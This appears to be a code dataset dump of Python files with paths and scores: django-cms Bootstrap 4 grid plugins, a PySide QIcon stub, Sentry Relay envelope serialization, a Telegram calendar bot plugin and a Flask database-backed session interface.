width = obj.glossary.get('{0}-column-width'.format(bp), '').replace('col-{0}-'.format(bp), '')
if width:
widths.append(width)
if len(widths) > 1:
content = _('widths: {0} units').format(' / '.join(widths))
elif len(widths) == 1:
width = widths[0]
content = ungettext_lazy('default width: {0} unit', 'default width: {0} units', width).format(width)
else:
content = _('unknown width')
return format_html('{0}{1}', identifier, content)
plugin_pool.register_plugin(BootstrapColumnPlugin) | cmsplugin_cascade/bootstrap4/container.py | from __future__ import unicode_literals
from django.core.exceptions import ValidationError
from django.db.models import Q
from django.forms import widgets
from django.forms.fields import ChoiceField
from django.forms.models import ModelForm
from django.utils.html import format_html
from django.utils.encoding import force_text
from django.utils.translation import ungettext_lazy, ugettext_lazy as _
from cms.plugin_pool import plugin_pool
from cmsplugin_cascade import app_settings
from cmsplugin_cascade.forms import ManageChildrenFormMixin
from cmsplugin_cascade.fields import GlossaryField
from .plugin_base import BootstrapPluginBase
from . import grid
def get_widget_choices():
breakpoints = app_settings.CMSPLUGIN_CASCADE['bootstrap4']['fluid_bounds']
widget_choices = []
for index, (bp, bound) in enumerate(breakpoints.items()):
if index == 0:
widget_choices.append((bp.name, "{} (<{:.1f}px)".format(bp.label, bound.max)))
elif index == len(breakpoints) - 1:
widget_choices.append((bp.name, "{} (≥{:.1f}px)".format(bp.label, bound.min)))
else:
widget_choices.append((bp.name, "{} (≥{:.1f}px and <{:.1f}px)".format(bp.label, bound.min, bound.max)))
return widget_choices
class ContainerBreakpointsWidget(widgets.CheckboxSelectMultiple):
template_name = 'cascade/forms/widgets/container_breakpoints.html'
def render(self, name, value, attrs=None, renderer=None):
attrs = dict(attrs, version=4)
return super(ContainerBreakpointsWidget, self).render(name, value, attrs, renderer)
class BootstrapContainerForm(ModelForm):
"""
Form class to validate the container.
"""
def clean_glossary(self):
if len(self.cleaned_data['glossary']['breakpoints']) == 0:
raise ValidationError(_("At least one breakpoint must be selected."))
return self.cleaned_data['glossary']
class ContainerGridMixin(object):
def get_grid_instance(self):
fluid = self.glossary.get('fluid', False)
try:
breakpoints = [getattr(grid.Breakpoint, bp) for bp in self.glossary['breakpoints']]
except KeyError:
breakpoints = [bp for bp in grid.Breakpoint]
if fluid:
bounds = dict((bp, grid.fluid_bounds[bp]) for bp in breakpoints)
else:
bounds = dict((bp, grid.default_bounds[bp]) for bp in breakpoints)
return grid.Bootstrap4Container(bounds=bounds)
class BootstrapContainerPlugin(BootstrapPluginBase):
name = _("Container")
parent_classes = None
require_parent = False
form = BootstrapContainerForm
glossary_variables = ['container_max_widths', 'media_queries']
glossary_field_order = ['breakpoints', 'fluid']
model_mixins = (ContainerGridMixin,)
breakpoints = GlossaryField(
ContainerBreakpointsWidget(choices=get_widget_choices()),
label=_('Available Breakpoints'),
initial=[bp.name for bp in app_settings.CMSPLUGIN_CASCADE['bootstrap4']['fluid_bounds'].keys()],
help_text=_("Supported display widths for Bootstrap's grid system."),
)
fluid = GlossaryField(
widgets.CheckboxInput(),
label=_('Fluid Container'), initial=False,
help_text=_("Changing your outermost '.container' to '.container-fluid'.")
)
@classmethod
def get_identifier(cls, obj):
identifier = super(BootstrapContainerPlugin, cls).get_identifier(obj)
breakpoints = obj.glossary.get('breakpoints')
content = obj.glossary.get('fluid') and '(fluid) ' or ''
if breakpoints:
breakpoints = app_settings.CMSPLUGIN_CASCADE['bootstrap4']['fluid_bounds']
devices = ', '.join([force_text(bp.label) for bp in breakpoints])
content = _("{0}for {1}").format(content, devices)
return format_html('{0}{1}', identifier, content)
@classmethod
def get_css_classes(cls, obj):
css_classes = cls.super(BootstrapContainerPlugin, cls).get_css_classes(obj)
if obj.glossary.get('fluid'):
css_classes.append('container-fluid')
else:
css_classes.append('container')
return css_classes
def save_model(self, request, obj, form, change):
super(BootstrapContainerPlugin, self).save_model(request, obj, form, change)
obj.sanitize_children()
plugin_pool.register_plugin(BootstrapContainerPlugin)
class BootstrapRowForm(ManageChildrenFormMixin, ModelForm):
"""
Form class to add non-materialized field to count the number of children.
"""
ROW_NUM_COLUMNS = [1, 2, 3, 4, 6, 12]
num_children = ChoiceField(
choices=[(i, ungettext_lazy('{0} column', '{0} columns', i).format(i)) for i in ROW_NUM_COLUMNS],
initial=3, label=_('Columns'),
help_text=_('Number of columns to be created with this row.'))
class RowGridMixin(object):
def get_grid_instance(self):
row = grid.Bootstrap4Row()
query = Q(plugin_type='BootstrapContainerPlugin') | Q(plugin_type='BootstrapColumnPlugin') \
| Q(plugin_type='BootstrapJumbotronPlugin')
container = self.get_ancestors().order_by('depth').filter(query).last().get_bound_plugin().get_grid_instance()
container.add_row(row)
return row
class BootstrapRowPlugin(BootstrapPluginBase):
name = _("Row")
default_css_class = 'row'
parent_classes = ['BootstrapContainerPlugin', 'BootstrapColumnPlugin', 'BootstrapJumbotronPlugin']
form = BootstrapRowForm
fields = ['num_children', 'glossary']
model_mixins = (RowGridMixin,)
@classmethod
def get_identifier(cls, obj):
identifier = super(BootstrapRowPlugin, cls).get_identifier(obj)
num_cols = obj.get_num_children()
content = ungettext_lazy("with {0} column", "with {0} columns", num_cols).format(num_cols)
return format_html('{0}{1}', identifier, content)
def save_model(self, request, obj, form, change):
wanted_children = int(form.cleaned_data.get('num_children'))
super(BootstrapRowPlugin, self).save_model(request, obj, form, change)
child_glossary = {'xs-column-width': 'col'}
self.extend_children(obj, wanted_children, BootstrapColumnPlugin, child_glossary=child_glossary)
plugin_pool.register_plugin(BootstrapRowPlugin)
class ColumnGridMixin(object):
valid_keys = ['xs-column-width', 'sm-column-width', 'md-column-width', 'lg-column-width', 'xs-column-width',
'xs-column-offset', 'sm-column-offset', 'md-column-offset', 'lg-column-offset', 'xs-column-offset']
def get_grid_instance(self):
column = None
query = Q(plugin_type='BootstrapRowPlugin')
row_obj = self.get_ancestors().order_by('depth').filter(query).last().get_bound_plugin()
# column_siblings = row_obj.get_descendants().order_by('depth').filter(plugin_type='BootstrapColumnPlugin')
row = row_obj.get_grid_instance()
for column_sibling in self.get_siblings():
classes = [val for key, val in column_sibling.get_bound_plugin().glossary.items()
if key in self.valid_keys and val]
if column_sibling.pk == self.pk:
column = grid.Bootstrap4Column(classes)
row.add_column(column)
else:
row.add_column(grid.Bootstrap4Column(classes))
return column
class BootstrapColumnPlugin(BootstrapPluginBase):
name = _("Column")
parent_classes = ('BootstrapRowPlugin',)
child_classes = ('BootstrapJumbotronPlugin',)
alien_child_classes = True
default_css_attributes = [fmt.format(bp.name) for bp in grid.Breakpoint
for fmt in ('{}-column-width', '{}-column-offset', '{}-column-ordering', '{}-responsive-utils')]
glossary_variables = ['container_max_widths']
model_mixins = (ColumnGridMixin,)
def get_form(self, request, obj=None, **kwargs):
def choose_help_text(*phrases):
bounds = 'fluid_bounds' if container.glossary.get('fluid') else 'default_bounds'
bs4_breakpoints = app_settings.CMSPLUGIN_CASCADE['bootstrap4'][bounds]
if last:
return phrases[0].format(bs4_breakpoints[last].max)
elif len(breakpoints) > 1:
return phrases[1].format(bs4_breakpoints[first].min)
else:
return phrases[2]
if 'parent' in self._cms_initial_attributes:
container=self._cms_initial_attributes['parent'].get_ancestors().order_by('depth').last().get_bound_plugin()
else:
containers=obj.get_ancestors().filter(plugin_type='BootstrapContainerPlugin')
if containers:
container=containers.order_by('depth').last().get_bound_plugin()
else:
jumbotrons=obj.get_ancestors().filter(plugin_type='BootstrapJumbotronPlugin')
container=jumbotrons.order_by('depth').last().get_bound_plugin()
breakpoints = container.glossary['breakpoints']
glossary_fields = []
units = [ungettext_lazy("{} unit", "{} units", i).format(i) for i in range(0, 13)]
for bp in breakpoints:
try:
last = getattr(grid.Breakpoint, breakpoints[breakpoints.index(bp) + 1])
except IndexError:
last = None
finally:
first = getattr(grid.Breakpoint, bp)
devices = ', '.join([force_text(b.label) for b in grid.Breakpoint.range(first, last)])
if bp == 'xs':
choices = [('col', _("Flex column"))]
choices.extend(('col-{}'.format(i), _("{} fixed column").format(units[i])) for i in range(1, 13))
choices.append(('col-auto', _("Auto column")))
else:
choices = [('col-{}'.format(bp), _("Flex column"))]
choices.extend(('col-{}-{}'.format(bp, i), _("{} fixed column").format(units[i])) for i in range(1, 13))
choices.append(('col-{}-auto'.format(bp), _("Auto column")))
if breakpoints.index(bp) == 0:
# first breakpoint
glossary_fields.append(GlossaryField(
widgets.Select(choices=choices),
label=_("Column width for {}").format(devices),
name='{}-column-width'.format(bp),
initial='col-{}-12'.format(bp),
help_text=choose_help_text(
_("Column width for devices narrower than {:.1f} pixels."),
_("Column width for devices wider than {:.1f} pixels."),
_("Column width for all devices."),
)
))
else:
# wider breakpoints may inherit from next narrower ones
choices.insert(0, ('', _("Inherit from above")))
glossary_fields.append(GlossaryField(
widgets.Select(choices=choices),
label=_("Column width for {}").format(devices),
name='{}-column-width'.format(bp),
initial='',
help_text=choose_help_text(
_("Override column width for devices narrower than {:.1f} pixels."),
_("Override column width for devices wider than {:.1f} pixels."),
_("Override column width for all devices."),
)
))
# handle offset
if breakpoints.index(bp) == 0:
choices = [('', _("No offset"))]
offset_range = range(1, 13)
else:
choices = [('', _("Inherit from above"))]
offset_range = range(0, 13)
if bp == 'xs':
choices.extend(('offset-{}'.format(i), units[i]) for i in offset_range)
else:
choices.extend(('offset-{}-{}'.format(bp, i), units[i]) for i in offset_range)
label = _("Offset for {}").format(devices)
help_text = choose_help_text(
_("Offset width for devices narrower than {:.1f} pixels."),
_("Offset width for devices wider than {:.1f} pixels."),
_("Offset width for all devices.")
)
glossary_fields.append(GlossaryField(
widgets.Select(choices=choices),
label=label,
name='{}-column-offset'.format(bp),
help_text=help_text))
# handle column reordering
choices = [('', _("No reordering"))]
if bp == 'xs':
choices.extend(('order-{}'.format(i), _("Reorder by {}").format(units[i])) for i in range(1, 13))
else:
choices.extend(('order-{}-{}'.format(bp, i), _("Reorder by {}").format(units[i])) for i in range(1, 13))
label = _("Reordering for {}").format(devices)
help_text = choose_help_text(
_("Reordering for devices narrower than {:.1f} pixels."),
_("Reordering for devices wider than {:.1f} pixels."),
_("Reordering for all devices.")
)
glossary_fields.append(GlossaryField(
widgets.Select(choices=choices),
label=label,
name='{}-column-ordering'.format(bp),
help_text=help_text))
# handle responsive utilities
choices = [('', _("Default")), ('visible-{}'.format(bp), _("Visible")), ('hidden-{}'.format(bp), _("Hidden"))]
label = _("Responsive utilities for {}").format(devices)
help_text = choose_help_text(
_("Utility classes for showing and hiding content by devices narrower than {:.1f} pixels."),
_("Utility classes for showing and hiding content by devices wider than {:.1f} pixels."),
_("Utility classes for showing and hiding content for all devices.")
)
glossary_fields.append(GlossaryField(
widgets.RadioSelect(choices=choices),
label=label,
name='{}-responsive-utils'.format(bp),
initial='',
help_text=help_text))
glossary_fields = [
glossary_fields[i + len(glossary_fields) // len(breakpoints) * j]
for i in range(0, len(glossary_fields) // len(breakpoints))
for j in range(0, len(breakpoints))
]
kwargs.update(glossary_fields=glossary_fields)
return super(BootstrapColumnPlugin, self).get_form(request, obj, **kwargs)
def save_model(self, request, obj, form, change):
super(BootstrapColumnPlugin, self).save_model(request, obj, form, change)
obj.sanitize_children()
@classmethod
def sanitize_model(cls, obj):
sanitized = super(BootstrapColumnPlugin, cls).sanitize_model(obj)
return sanitized
@classmethod
def get_identifier(cls, obj):
identifier = super(BootstrapColumnPlugin, cls).get_identifier(obj)
glossary = obj.get_complete_glossary()
widths = []
for bp in glossary.get('breakpoints', []):
width = obj.glossary.get('{0}-column-width'.format(bp), '').replace('col-{0}-'.format(bp), '')
if width:
widths.append(width)
if len(widths) > 1:
content = _('widths: {0} units').format(' / '.join(widths))
elif len(widths) == 1:
width = widths[0]
content = ungettext_lazy('default width: {0} unit', 'default width: {0} units', width).format(width)
else:
content = _('unknown width')
return format_html('{0}{1}', identifier, content)
plugin_pool.register_plugin(BootstrapColumnPlugin) | 0.618204 | 0.092442 |
# imports
import PySide.QtCore as __PySide_QtCore
import Shiboken as __Shiboken
class QIcon(__Shiboken.Object):
# no doc
def actualSize(self, *args, **kwargs): # real signature unknown
pass
def addFile(self, *args, **kwargs): # real signature unknown
pass
def addPixmap(self, *args, **kwargs): # real signature unknown
pass
def availableSizes(self, *args, **kwargs): # real signature unknown
pass
def cacheKey(self, *args, **kwargs): # real signature unknown
pass
def fromTheme(self, *args, **kwargs): # real signature unknown
pass
def hasThemeIcon(self, *args, **kwargs): # real signature unknown
pass
def isNull(self, *args, **kwargs): # real signature unknown
pass
def name(self, *args, **kwargs): # real signature unknown
pass
def paint(self, *args, **kwargs): # real signature unknown
pass
def pixmap(self, *args, **kwargs): # real signature unknown
pass
def setThemeName(self, *args, **kwargs): # real signature unknown
pass
def setThemeSearchPaths(self, *args, **kwargs): # real signature unknown
pass
def swap(self, *args, **kwargs): # real signature unknown
pass
def themeName(self, *args, **kwargs): # real signature unknown
pass
def themeSearchPaths(self, *args, **kwargs): # real signature unknown
pass
def __copy__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
def __lshift__(self, y): # real signature unknown; restored from __doc__
""" x.__lshift__(y) <==> x<<y """
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __nonzero__(self): # real signature unknown; restored from __doc__
""" x.__nonzero__() <==> x != 0 """
pass
def __rlshift__(self, y): # real signature unknown; restored from __doc__
""" x.__rlshift__(y) <==> y<<x """
pass
def __rrshift__(self, y): # real signature unknown; restored from __doc__
""" x.__rrshift__(y) <==> y>>x """
pass
def __rshift__(self, y): # real signature unknown; restored from __doc__
""" x.__rshift__(y) <==> x>>y """
pass
Active = PySide.QtGui.QIcon.Mode.Active
Disabled = PySide.QtGui.QIcon.Mode.Disabled
Mode = None # (!) real value is "<type 'PySide.QtGui.QIcon.Mode'>"
Normal = PySide.QtGui.QIcon.Mode.Normal
Off = PySide.QtGui.QIcon.State.Off
On = PySide.QtGui.QIcon.State.On
Selected = PySide.QtGui.QIcon.Mode.Selected
State = None # (!) real value is "<type 'PySide.QtGui.QIcon.State'>" | resources/dot_PyCharm/system/python_stubs/-762174762/PySide/QtGui/QIcon.py |
# imports
import PySide.QtCore as __PySide_QtCore
import Shiboken as __Shiboken
class QIcon(__Shiboken.Object):
# no doc
def actualSize(self, *args, **kwargs): # real signature unknown
pass
def addFile(self, *args, **kwargs): # real signature unknown
pass
def addPixmap(self, *args, **kwargs): # real signature unknown
pass
def availableSizes(self, *args, **kwargs): # real signature unknown
pass
def cacheKey(self, *args, **kwargs): # real signature unknown
pass
def fromTheme(self, *args, **kwargs): # real signature unknown
pass
def hasThemeIcon(self, *args, **kwargs): # real signature unknown
pass
def isNull(self, *args, **kwargs): # real signature unknown
pass
def name(self, *args, **kwargs): # real signature unknown
pass
def paint(self, *args, **kwargs): # real signature unknown
pass
def pixmap(self, *args, **kwargs): # real signature unknown
pass
def setThemeName(self, *args, **kwargs): # real signature unknown
pass
def setThemeSearchPaths(self, *args, **kwargs): # real signature unknown
pass
def swap(self, *args, **kwargs): # real signature unknown
pass
def themeName(self, *args, **kwargs): # real signature unknown
pass
def themeSearchPaths(self, *args, **kwargs): # real signature unknown
pass
def __copy__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
def __lshift__(self, y): # real signature unknown; restored from __doc__
""" x.__lshift__(y) <==> x<<y """
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __nonzero__(self): # real signature unknown; restored from __doc__
""" x.__nonzero__() <==> x != 0 """
pass
def __rlshift__(self, y): # real signature unknown; restored from __doc__
""" x.__rlshift__(y) <==> y<<x """
pass
def __rrshift__(self, y): # real signature unknown; restored from __doc__
""" x.__rrshift__(y) <==> y>>x """
pass
def __rshift__(self, y): # real signature unknown; restored from __doc__
""" x.__rshift__(y) <==> x>>y """
pass
Active = PySide.QtGui.QIcon.Mode.Active
Disabled = PySide.QtGui.QIcon.Mode.Disabled
Mode = None # (!) real value is "<type 'PySide.QtGui.QIcon.Mode'>"
Normal = PySide.QtGui.QIcon.Mode.Normal
Off = PySide.QtGui.QIcon.State.Off
On = PySide.QtGui.QIcon.State.On
Selected = PySide.QtGui.QIcon.Mode.Selected
State = None # (!) real value is "<type 'PySide.QtGui.QIcon.State'>" | 0.528777 | 0.084833 |
import io
import sys
import json
import shutil
PY2 = sys.version_info[0] == 2
if PY2:
text_type = unicode # NOQA
else:
text_type = str
class Envelope(object):
def __init__(self, headers=None, items=None):
if headers is not None:
headers = dict(headers)
self.headers = headers or {}
if items is None:
items = []
else:
items = list(items)
self.items = items
def add_item(self, item):
self.items.append(item)
def get_event(self):
for items in self.items:
event = items.get_event()
if event is not None:
return event
def __iter__(self):
return iter(self.items)
def serialize_into(self, f):
f.write(json.dumps(self.headers).encode("utf-8"))
f.write(b"\n")
for item in self.items:
item.serialize_into(f)
def serialize(self):
out = io.BytesIO()
self.serialize_into(out)
return out.getvalue()
@classmethod
def deserialize_from(cls, f):
headers = json.loads(f.readline())
items = []
while 1:
item = Item.deserialize_from(f)
if item is None:
break
items.append(item)
return cls(headers=headers, items=items)
@classmethod
def deserialize(cls, bytes):
return cls.deserialize_from(io.BytesIO(bytes))
def __repr__(self):
return "<Envelope headers=%r items=%r>" % (self.headers, self.items,)
class PayloadRef(object):
def __init__(self, bytes=None, path=None, event=None):
self.bytes = bytes
self.path = path
self.event = event
def get_bytes(self):
if self.bytes is None:
if self.path is not None:
with open(self.path, "rb") as f:
self.bytes = f.read()
elif self.event is not None:
self.bytes = json.dumps(self.event).encode("utf-8")
else:
self.bytes = b""
return self.bytes
def prepare_serialize(self):
if self.path is not None and self.bytes is None:
f = open(self.path, "rb")
f.seek(0, 2)
length = f.tell()
f.seek(0, 0)
def writer(out):
try:
shutil.copyfileobj(f, out)
finally:
f.close()
return length, writer
bytes = self.get_bytes()
return len(bytes), lambda f: f.write(bytes)
@property
def _type(self):
if self.event is not None:
return "event"
elif self.bytes is not None:
return "bytes"
elif self.path is not None:
return "path"
return "empty"
def __repr__(self):
return "<Payload %r>" % (self._type,)
class Item(object):
def __init__(self, payload, headers=None):
if headers is not None:
headers = dict(headers)
elif headers is None:
headers = {}
self.headers = headers
if isinstance(payload, bytes):
payload = PayloadRef(bytes=payload)
elif isinstance(payload, text_type):
payload = PayloadRef(bytes=payload.encode("utf-8"))
elif isinstance(payload, dict):
payload = PayloadRef(event=payload)
else:
payload = payload
if "content_type" not in headers:
if payload.event is not None:
headers["content_type"] = "application/json"
else:
headers["content_type"] = "application/octet-stream"
if "type" not in headers:
if payload.event is not None:
headers["type"] = "event"
else:
headers["type"] = "attachment"
self.payload = payload
def __repr__(self):
return "<Item headers=%r payload=%r>" % (self.headers, self.payload,)
def get_bytes(self):
return self.payload.get_bytes()
def get_event(self):
if self.payload.event is not None:
return self.payload.event
def serialize_into(self, f):
headers = dict(self.headers)
length, writer = self.payload.prepare_serialize()
headers["length"] = length
f.write(json.dumps(headers).encode("utf-8"))
f.write(b"\n")
writer(f)
f.write(b"\n")
def serialize(self):
out = io.BytesIO()
self.serialize_into(out)
return out.getvalue()
@classmethod
def deserialize_from(cls, f):
line = f.readline().rstrip()
if not line:
return
headers = json.loads(line)
length = headers["length"]
payload = f.read(length)
if headers.get("type") == "event":
rv = cls(headers=headers, payload=PayloadRef(event=json.loads(payload)))
else:
rv = cls(headers=headers, payload=payload)
f.readline()
return rv
@classmethod
def deserialize(cls, bytes):
return cls.deserialize_from(io.BytesIO(bytes)) | py/sentry_relay/envelope.py | import io
import sys
import json
import shutil
PY2 = sys.version_info[0] == 2
if PY2:
text_type = unicode # NOQA
else:
text_type = str
class Envelope(object):
def __init__(self, headers=None, items=None):
if headers is not None:
headers = dict(headers)
self.headers = headers or {}
if items is None:
items = []
else:
items = list(items)
self.items = items
def add_item(self, item):
self.items.append(item)
def get_event(self):
for items in self.items:
event = items.get_event()
if event is not None:
return event
def __iter__(self):
return iter(self.items)
def serialize_into(self, f):
f.write(json.dumps(self.headers).encode("utf-8"))
f.write(b"\n")
for item in self.items:
item.serialize_into(f)
def serialize(self):
out = io.BytesIO()
self.serialize_into(out)
return out.getvalue()
@classmethod
def deserialize_from(cls, f):
headers = json.loads(f.readline())
items = []
while 1:
item = Item.deserialize_from(f)
if item is None:
break
items.append(item)
return cls(headers=headers, items=items)
@classmethod
def deserialize(cls, bytes):
return cls.deserialize_from(io.BytesIO(bytes))
def __repr__(self):
return "<Envelope headers=%r items=%r>" % (self.headers, self.items,)
class PayloadRef(object):
def __init__(self, bytes=None, path=None, event=None):
self.bytes = bytes
self.path = path
self.event = event
def get_bytes(self):
if self.bytes is None:
if self.path is not None:
with open(self.path, "rb") as f:
self.bytes = f.read()
elif self.event is not None:
self.bytes = json.dumps(self.event).encode("utf-8")
else:
self.bytes = b""
return self.bytes
def prepare_serialize(self):
if self.path is not None and self.bytes is None:
f = open(self.path, "rb")
f.seek(0, 2)
length = f.tell()
f.seek(0, 0)
def writer(out):
try:
shutil.copyfileobj(f, out)
finally:
f.close()
return length, writer
bytes = self.get_bytes()
return len(bytes), lambda f: f.write(bytes)
@property
def _type(self):
if self.event is not None:
return "event"
elif self.bytes is not None:
return "bytes"
elif self.path is not None:
return "path"
return "empty"
def __repr__(self):
return "<Payload %r>" % (self._type,)
class Item(object):
def __init__(self, payload, headers=None):
if headers is not None:
headers = dict(headers)
elif headers is None:
headers = {}
self.headers = headers
if isinstance(payload, bytes):
payload = PayloadRef(bytes=payload)
elif isinstance(payload, text_type):
payload = PayloadRef(bytes=payload.encode("utf-8"))
elif isinstance(payload, dict):
payload = PayloadRef(event=payload)
else:
payload = payload
if "content_type" not in headers:
if payload.event is not None:
headers["content_type"] = "application/json"
else:
headers["content_type"] = "application/octet-stream"
if "type" not in headers:
if payload.event is not None:
headers["type"] = "event"
else:
headers["type"] = "attachment"
self.payload = payload
def __repr__(self):
return "<Item headers=%r payload=%r>" % (self.headers, self.payload,)
def get_bytes(self):
return self.payload.get_bytes()
def get_event(self):
if self.payload.event is not None:
return self.payload.event
def serialize_into(self, f):
headers = dict(self.headers)
length, writer = self.payload.prepare_serialize()
headers["length"] = length
f.write(json.dumps(headers).encode("utf-8"))
f.write(b"\n")
writer(f)
f.write(b"\n")
def serialize(self):
out = io.BytesIO()
self.serialize_into(out)
return out.getvalue()
@classmethod
def deserialize_from(cls, f):
line = f.readline().rstrip()
if not line:
return
headers = json.loads(line)
length = headers["length"]
payload = f.read(length)
if headers.get("type") == "event":
rv = cls(headers=headers, payload=PayloadRef(event=json.loads(payload)))
else:
rv = cls(headers=headers, payload=payload)
f.readline()
return rv
@classmethod
def deserialize(cls, bytes):
return cls.deserialize_from(io.BytesIO(bytes)) | 0.370795 | 0.085633 |
from __future__ import print_function
import telegram
from telegram.ext import MessageHandler, Filters
from textblob import TextBlob
from myTelegramBot.PluginSystem import BasePlugin
from myTelegramBot.libs.gcal import GoogleCalendar
import datetime
class HelloFilter(Filters):
def __init__(self):
super(HelloFilter, self).__init__()
@staticmethod
def text(message):
blob = TextBlob(message.text)
if 'ciao' in blob.tokens.lower() and 'racbot' in blob.tokens.lower():
return message.text
return None
class EventsFilter(Filters):
def __init__(self):
super(EventsFilter, self).__init__()
@staticmethod
def text(message):
blob = TextBlob(message.text)
if 'eventi' in blob.tokens.lower() and 'racbot' in blob.tokens.lower():
return message.text
return None
class RacPlugin(BasePlugin):
def __init__(self, *args, **kwargs):
super(RacPlugin, self).__init__(*args, **kwargs)
@staticmethod
def hello(bot, update):
"""
Method which answer to an Hello
:param bot:
:type bot:
:param update:
:type update:
"""
chat_id = update.message.chat_id
user = update.message.from_user
bot.sendMessage(chat_id, "Ciao: {}!".format(user.first_name))
@staticmethod
def show_events(bot, update, user_data):
chat_id = update.message.chat_id
user = update.message.from_user
cal_manager = GoogleCalendar()
events = cal_manager.get_events()
bot.sendMessage(chat_id, "Certo {}, ecco i prossimi 10 eventi secondo il calendario:".format(user.first_name))
msg = str()
for event in events:
try:
start_time = datetime.datetime.strptime(event['start'].get('dateTime').split('+')[0],
'%Y-%m-%dT%H:%M:%S').__str__()
except AttributeError:
start_time = datetime.datetime.strptime(event['start'].get('date'), '%Y-%m-%d')
if 'location' in event.keys():
location = event['location']
else:
location = 'Mi dispiace, qualche pigro non ha inserito la location.'
msg += "{} : {}. Luogo: {}\n\n".format(start_time, event['summary'], location)
bot.sendMessage(chat_id, text=msg, parse_mode=telegram.ParseMode.MARKDOWN)
def setup(self):
self.dispatcher.add_handler(
MessageHandler([HelloFilter.text], self.hello, pass_user_data=False)
)
self.dispatcher.add_handler(
MessageHandler([EventsFilter.text], self.show_events, pass_user_data=True)
)
def initialize(*args, **kwargs):
return RacPlugin(*args, **kwargs) | myTelegramBot/modules/rac_plugin.py | from __future__ import print_function
import telegram
from telegram.ext import MessageHandler, Filters
from textblob import TextBlob
from myTelegramBot.PluginSystem import BasePlugin
from myTelegramBot.libs.gcal import GoogleCalendar
import datetime
class HelloFilter(Filters):
def __init__(self):
super(HelloFilter, self).__init__()
@staticmethod
def text(message):
blob = TextBlob(message.text)
if 'ciao' in blob.tokens.lower() and 'racbot' in blob.tokens.lower():
return message.text
return None
class EventsFilter(Filters):
def __init__(self):
super(EventsFilter, self).__init__()
@staticmethod
def text(message):
blob = TextBlob(message.text)
if 'eventi' in blob.tokens.lower() and 'racbot' in blob.tokens.lower():
return message.text
return None
class RacPlugin(BasePlugin):
def __init__(self, *args, **kwargs):
super(RacPlugin, self).__init__(*args, **kwargs)
@staticmethod
def hello(bot, update):
"""
Method which answer to an Hello
:param bot:
:type bot:
:param update:
:type update:
"""
chat_id = update.message.chat_id
user = update.message.from_user
bot.sendMessage(chat_id, "Ciao: {}!".format(user.first_name))
@staticmethod
def show_events(bot, update, user_data):
chat_id = update.message.chat_id
user = update.message.from_user
cal_manager = GoogleCalendar()
events = cal_manager.get_events()
bot.sendMessage(chat_id, "Certo {}, ecco i prossimi 10 eventi secondo il calendario:".format(user.first_name))
msg = str()
for event in events:
try:
start_time = datetime.datetime.strptime(event['start'].get('dateTime').split('+')[0],
'%Y-%m-%dT%H:%M:%S').__str__()
except AttributeError:
start_time = datetime.datetime.strptime(event['start'].get('date'), '%Y-%m-%d')
if 'location' in event.keys():
location = event['location']
else:
location = 'Mi dispiace, qualche pigro non ha inserito la location.'
msg += "{} : {}. Luogo: {}\n\n".format(start_time, event['summary'], location)
bot.sendMessage(chat_id, text=msg, parse_mode=telegram.ParseMode.MARKDOWN)
def setup(self):
self.dispatcher.add_handler(
MessageHandler([HelloFilter.text], self.hello, pass_user_data=False)
)
self.dispatcher.add_handler(
MessageHandler([EventsFilter.text], self.show_events, pass_user_data=True)
)
def initialize(*args, **kwargs):
return RacPlugin(*args, **kwargs) | 0.501221 | 0.078819 |
from json import loads, dumps
from uuid import uuid4
from datetime import datetime, timedelta
from flask.sessions import SessionInterface, SessionMixin
from flask_login import _create_identifier
from dataactcore.interfaces.db import GlobalDB
from dataactcore.models.userModel import SessionMap
class LoginSession:
"""
This class is a wrapper for the session object
"""
@staticmethod
def logout(session):
"""
arguments:
session -- (Session) the session object
Clears the current session
"""
session.pop("login", None)
session.pop("name", None)
@staticmethod
def login(session, username):
"""
arguments:
session -- (Session) the session object
username -- (int) the id of the user
Sets the current session status
"""
session["name"] = username
session["login"] = True
@staticmethod
def reset_id(session):
"""
arguments:
session -- (Session) the session object
resets the _uid in cases that the session becomes invalid
"""
session["_uid"] = "{}|{}".format(_create_identifier(), uuid4())
def to_unix_time(datetime_value):
"""
arguments:
datetime_value -- (DateTime)
Converts datetime_value to time in seconds since 1970
returns int
"""
if isinstance(datetime_value, datetime):
# If argument is a datetime object, convert to timestamp
return (datetime_value - datetime(1970, 1, 1)).total_seconds()
return datetime_value
class UserSession(dict, SessionMixin):
"""
Class that wraps around normal Flask Session object
"""
pass
class UserSessionInterface(SessionInterface):
"""
Class That implements the SessionInterface and uses SessionTable to store data
"""
SESSION_CLEAR_COUNT_LIMIT = 10
CountLimit = 1
def __init__(self):
return
def open_session(self, app, request):
"""
arguments:
app -- (Flask) the Flask application
request -- (Request) the request object
implements the open_session method that pulls or creates a new UserSession object
"""
sid = request.headers.get("x-session-id")
if sid and SessionTable.does_session_exist(sid):
if SessionTable.get_timeout(sid) > to_unix_time(datetime.utcnow()):
session_dict = UserSession()
# Read data as json
data = loads(SessionTable.get_data(sid))
for key in data.keys():
session_dict[key] = data[key]
return session_dict
# This can be made better most likely need to do research
# Maybe Hash(time + server id + random number)? Want to prevent any conflicts
sid = str(uuid4())
session_dict = UserSession()
session_dict["sid"] = sid
return session_dict
def save_session(self, app, session, response):
"""
arguments:
app -- (Flask) the Flask application
request -- (Request) the request object
session -- (Session) the session object
implements the save_session method that saves the session or clears it
based on the timeout limit, this function also extends the expiration time of the current session
"""
if not session:
return
# Extend the expiration based on either the time out limit set here or
# the permanent_session_lifetime property of the app
if self.get_expiration_time(app, session):
expiration = self.get_expiration_time(app, session)
else:
if "session_check" in session and session["session_check"] and \
SessionTable.does_session_exist(session["sid"]):
# This is just a session check, don't extend expiration time
expiration = SessionTable.get_timeout(session["sid"])
# Make sure next route call does not get counted as session check
session["session_check"] = False
else:
expiration = datetime.utcnow() + timedelta(seconds=SessionTable.TIME_OUT_LIMIT)
if "_uid" not in session:
LoginSession.reset_id(session)
SessionTable.new_session(session["sid"], session, expiration)
UserSessionInterface.CountLimit += 1
if UserSessionInterface.CountLimit % UserSessionInterface.SESSION_CLEAR_COUNT_LIMIT == 0:
SessionTable.clear_sessions()
UserSessionInterface.CountLimit = 1
# Return session ID as header x-session-id
response.headers["x-session-id"] = session["sid"]
